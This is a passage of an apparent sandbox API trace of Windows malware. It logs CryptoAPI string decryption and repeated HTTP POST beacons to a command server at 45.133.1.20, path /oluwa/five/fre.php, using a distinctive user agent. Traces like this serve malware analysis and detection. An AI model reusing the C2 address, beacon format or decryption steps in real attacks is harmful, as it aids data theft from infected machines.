| out: hHeap=0x6a0000) returned 1 [0197.236] GetProcessHeap () returned 0x6a0000 [0197.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0197.236] closesocket (s=0x4f4) returned 0 [0197.237] GetProcessHeap () returned 0x6a0000 [0197.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0197.237] GetProcessHeap () returned 0x6a0000 [0197.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0197.238] GetProcessHeap () returned 0x6a0000 [0197.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0197.238] GetProcessHeap () returned 0x6a0000 [0197.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0197.238] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x8f0) returned 0x4f4 [0197.240] Sleep (dwMilliseconds=0xea60) [0197.242] GetProcessHeap () returned 0x6a0000 [0197.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0197.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.244] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0197.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.251] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0197.260] GetProcessHeap () returned 0x6a0000 [0197.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c5aa8 [0197.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.262] CryptImportKey (in: hProv=0x6befd0, pbData=0x6c5aa8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0197.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.263] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0197.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.264] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0197.264] GetProcessHeap () returned 0x6a0000 [0197.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5aa8 | out: hHeap=0x6a0000) returned 1 [0197.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.266] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0197.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.268] CryptDestroyKey (hKey=0x6ad020) returned 1 [0197.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.272] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0197.272] GetProcessHeap () returned 0x6a0000 [0197.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0197.273] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.273] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0197.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.274] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0197.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.275] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0197.276] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.276] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0197.276] GetProcessHeap () returned 0x6a0000 [0197.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0197.276] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0197.276] GetProcessHeap () returned 0x6a0000 [0197.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0197.277] GetProcessHeap () returned 0x6a0000 [0197.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0197.277] GetProcessHeap () returned 0x6a0000 [0197.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0197.278] GetProcessHeap () returned 0x6a0000 [0197.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0197.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.279] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0197.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.285] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0197.292] GetProcessHeap () returned 0x6a0000 [0197.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0197.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.293] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0197.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.294] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0197.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.295] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0197.295] GetProcessHeap () returned 0x6a0000 [0197.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0197.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.297] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0197.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.298] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0197.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.300] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0197.300] GetProcessHeap () returned 0x6a0000 [0197.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0197.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.301] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0197.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.302] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0197.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.303] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0197.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.304] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0197.304] GetProcessHeap () returned 0x6a0000 [0197.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0197.304] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0197.304] GetProcessHeap () returned 0x6a0000 [0197.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0197.304] socket (af=2, type=1, protocol=6) returned 0x4f8 [0197.304] connect (s=0x4f8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0197.326] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0197.326] GetProcessHeap () returned 0x6a0000 [0197.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0197.327] GetProcessHeap () returned 0x6a0000 [0197.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0197.327] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0197.328] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0197.328] GetProcessHeap () returned 0x6a0000 [0197.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0197.329] GetProcessHeap () returned 0x6a0000 [0197.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0197.330] GetProcessHeap () returned 0x6a0000 [0197.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0197.330] GetProcessHeap () returned 0x6a0000 [0197.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0197.331] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0197.332] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0197.332] GetProcessHeap () returned 0x6a0000 [0197.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0197.332] GetProcessHeap () returned 0x6a0000 [0197.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0197.333] send (s=0x4f8, buf=0x6b5c98*, len=242, flags=0) returned 242 [0197.334] send (s=0x4f8, buf=0x6bb998*, len=159, flags=0) returned 159 [0197.334] GetProcessHeap () returned 0x6a0000 [0197.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0197.334] recv (in: s=0x4f8, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0197.403] GetProcessHeap () returned 0x6a0000 [0197.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0197.404] GetProcessHeap () returned 0x6a0000 [0197.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0197.404] GetProcessHeap () returned 0x6a0000 [0197.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0197.405] GetProcessHeap () returned 0x6a0000 [0197.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0197.406] closesocket (s=0x4f8) returned 0 [0197.407] GetProcessHeap () returned 0x6a0000 [0197.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0197.407] GetProcessHeap () returned 0x6a0000 [0197.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0197.407] GetProcessHeap () returned 0x6a0000 [0197.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0197.408] GetProcessHeap () returned 0x6a0000 [0197.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0197.408] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x89c) returned 0x4f8 [0197.410] Sleep (dwMilliseconds=0xea60) [0197.412] GetProcessHeap () returned 0x6a0000 [0197.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0197.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.414] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0197.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.422] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0197.431] GetProcessHeap () returned 0x6a0000 [0197.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0197.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.432] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0197.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.434] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0197.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.435] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0197.435] GetProcessHeap () returned 0x6a0000 [0197.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0197.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.437] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0197.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.439] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0197.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.441] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0197.441] GetProcessHeap () returned 0x6a0000 [0197.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0197.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.447] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0197.448] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.448] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0197.449] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.450] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0197.451] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.451] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0197.451] GetProcessHeap () returned 0x6a0000 [0197.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0197.452] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0197.452] GetProcessHeap () returned 0x6a0000 [0197.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0197.452] GetProcessHeap () returned 0x6a0000 [0197.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0197.453] GetProcessHeap () returned 0x6a0000 [0197.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0197.453] GetProcessHeap () returned 0x6a0000 [0197.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0197.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.455] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0197.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.464] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0197.472] GetProcessHeap () returned 0x6a0000 [0197.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0197.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.473] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0197.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.474] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0197.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.475] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0197.475] GetProcessHeap () returned 0x6a0000 [0197.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0197.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.477] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0197.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.478] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0197.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.480] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0197.480] GetProcessHeap () returned 0x6a0000 [0197.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0197.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.482] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0197.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.483] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0197.484] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.484] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0197.486] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.486] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0197.486] GetProcessHeap () returned 0x6a0000 [0197.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0197.487] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0197.487] GetProcessHeap () returned 0x6a0000 [0197.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0197.487] socket (af=2, type=1, protocol=6) returned 0x4fc [0197.487] connect (s=0x4fc, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0197.512] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0197.512] GetProcessHeap () returned 0x6a0000 [0197.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0197.512] GetProcessHeap () returned 0x6a0000 [0197.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0197.513] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0197.514] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0197.514] GetProcessHeap () returned 0x6a0000 [0197.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0197.514] GetProcessHeap () returned 0x6a0000 [0197.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0197.515] GetProcessHeap () returned 0x6a0000 [0197.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0197.515] GetProcessHeap () returned 0x6a0000 [0197.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0197.516] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0197.517] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0197.517] GetProcessHeap () returned 0x6a0000 [0197.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0197.517] GetProcessHeap () returned 0x6a0000 [0197.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0197.517] send (s=0x4fc, buf=0x6b5c98*, len=242, flags=0) returned 242 [0197.518] send (s=0x4fc, buf=0x6bb998*, len=159, flags=0) returned 159 [0197.518] GetProcessHeap () returned 0x6a0000 [0197.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0197.518] recv (in: s=0x4fc, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0197.589] GetProcessHeap () returned 0x6a0000 [0197.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0197.589] GetProcessHeap () returned 0x6a0000 [0197.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0197.590] GetProcessHeap () returned 0x6a0000 [0197.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0197.591] GetProcessHeap () returned 0x6a0000 [0197.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0197.591] closesocket (s=0x4fc) returned 0 [0197.592] GetProcessHeap () returned 0x6a0000 [0197.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0197.592] GetProcessHeap () returned 0x6a0000 [0197.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0197.592] GetProcessHeap () returned 0x6a0000 [0197.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0197.592] GetProcessHeap () returned 0x6a0000 [0197.592] HeapFree (in: hHeap=0x6a0000, 